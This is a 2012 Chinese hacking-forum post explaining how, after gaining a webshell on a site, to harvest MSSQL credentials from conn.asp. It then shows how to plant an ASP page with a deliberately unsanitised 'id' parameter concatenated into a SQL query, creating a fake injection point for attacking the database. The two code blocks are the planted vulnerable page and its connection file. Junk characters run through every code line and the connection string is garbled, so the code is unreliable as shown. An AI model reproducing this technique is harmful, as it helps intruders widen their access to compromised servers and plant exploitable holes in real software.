中国网络渗透测试联盟

标题: 伪造注入点方法 [打印本页]

作者: admin    时间: 2012-9-13 17:53
标题: 伪造注入点方法
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:- H8 N. b; H; p% d6 h) n
ASP/Visual Basic代码
! D- B! v/ h7 u0 B( @' t<!--#include file="xx.asp"-->    ( ^" W* Y8 n4 n" I! g7 g' E! B
<%   
& J1 X3 m' s$ ^- X, Bset rs=server.createobject("ADODB.recordset")   
+ k) L1 N% {" O! r$ bid = request("id")   
8 j2 V0 Y$ J/ I  B0 o' {strSQL = "select * from admin where id=" & id    3 X2 [5 ?/ w+ R: @
rs.open strSQL,conn,1,3    . Z! O: o+ w& F
rs.close    ; U2 U- `3 {0 V
%>  * N% q% p$ n7 @; q! D- y" D. n
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!2 I, \. y% s4 O, ^" N
然后就要构造一个连接数据库的文件了,代码如下:7 M, F9 z9 f( j4 G# F) V' A
ASP/Visual Basic代码
, C- v7 C6 H6 q5 y9 C7 |% N6 z<%            0 o! a2 Q+ Q( U. Y/ \4 l: i
strSQLServerName = "000.000.000.000"     '服务器名称或地址    7 U5 v6 O( w% a5 s/ T- @9 ?8 i
strSQLDBUserName = "sqlname"         '数据库帐号    , C( F0 A% a" l
strSQLDBPassword = "sqlpass"         '数据库密码   
0 V! ~8 U8 G, I; y5 l' p1 cstrSQLDBName = "sqldataname"           '数据库名称    ( C. V; P( F1 }
Set conn = Server.CreateObject("ADODB.Connection")    1 H1 C1 @5 c# p5 f# ^, \
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"   
/ N: [3 a; e2 w, \" {+ C. @$ F9 uconn.open strCon    6 G" l& {2 ^5 c6 C- p
%>  
9 E* H4 N  V1 z' T; I. _这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功
2 ]  o0 p3 o1 ~, l$ L% }: M




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2